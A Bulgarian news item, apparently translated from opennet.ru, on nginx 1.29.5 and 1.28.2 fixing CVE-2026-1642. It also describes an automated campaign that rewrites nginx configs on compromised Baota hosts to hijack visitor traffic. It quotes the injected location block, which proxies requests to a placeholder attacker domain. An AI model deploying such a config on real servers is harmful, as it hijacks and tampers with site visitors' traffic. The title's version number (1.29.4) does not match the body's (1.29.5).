Nginx 1.29.4 с отстранена уязвимост. Атаки, променящи настройките на nginx за пренасочване на трафика

Създаден е новият основен релийз на nginx 1.29.5, в рамките на който продължава развитието на нови възможности, както и издаването на паралелно поддържаната стабилна версия nginx 1.28.2, в която се внасят единствено промени, свързани с отстраняване на сериозни грешки и уязвимости. В актуализациите е решена уязвимост (CVE-2026-1642), позволяваща на нападателя, който има възможността да извърши атака тип MITM между nginx и upstream-сървъра, да манипулира отговорите, изпращани на клиента. Проблемът засяга конфигурации, които проксият заявки (HTTP 1.x, HTTP/2, gRPC или uWSGI) към по-високопозициониран сервер, използващ TLS шифроване.

Освен уязвимостта в релийза 1.29.5, нивото на логване на SSL грешките „ech_required“ е намалено от „crit“ до „info“, а също така са решени няколко проблема: коригирано е обръщението към вече освободена памет (use-after-free) след преминаване на следващия gRPC или HTTP/2 backend; решен е проблемът с изпращането на некоректна HTTP/2 заявка след превключване на следващия upstream-сервер; поправено е нарастването на размера на отговора с няколко диапазона; настроено е задаването на променливата HTTP_HOST при проксиране към backend-овете FastCGI, SCGI и uwsgi.

Допълнително може да се отбележи откритата автоматизирана атака, която след успешен пробив сървъри се ограничава до промяна на конфигурацията на nginx. Пробивът се извършва чрез непоправената уязвимост React2Shell в сървърните компоненти на React на системи с хостинг контролни панели, като Baota (BT). Промените в конфигурацията на nginx пренасочвали заявките към хостваните сайтове на сървъра на нападателите, който извършвал внедряване на злонамерени промени в отговора, предоставян на потребителя. location /%PATH%/ { set $fullurl "$scheme://$host$request_uri"; rewrite ^/%PATH%/?(.*)$ /index.php?domain=$fullurl&$args break; proxy_set_header Host [Attacker_Domain]; proxy_set_header X-Real-IP $remote_addr; proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; proxy_set_header X-Forwarded-Proto $scheme; proxy_set_header User-Agent $http_user_agent; proxy_set_header Referer $http_referer; proxy_ssl_server_name on; proxy_pass http://[Attacker_Domain]; }

Така вместо инсталиране на руткитове или злонамерен софтуер на сървъра, атаката е организирана срещу клиентите, които отварят сайта, хостван на сървъра, без непосредствено да се променят компонентите на сайта на сървъра. Атаката е насочена основно към прихващане на трафика от домейни на азиатските страни, както и домейни *.edu и *.gov. Чрез сървъра на атакуващите се пренасочват селективни заявки, например, съдържащи в пътища думите „pg“, „pgslot“, „slot“, „game“, „casino“, „live“, „help“, „news“, „page“, „blog“, „about“, „support“ и „info“. Атаката се извършва автоматизирано с помощта на инструментариум, който извършва търсене и анализ на конфигурацията на nginx, избор и подмяна на шаблон за настройки, рестартиране на nginx и проверка на работата на променената версия.

Nginx 1.29.4 с отстранена уязвимост. Атаки, променящи настройките на nginx за пренасочване на трафика


Източник: opennet.ru
Купете надежден хостинг за сайтове с защита от DDoS, VPS VDS сървъри 🔥 Купете надежден хостинг за сайтове с защита от DDoS, VPS VDS сървъри | ProHoster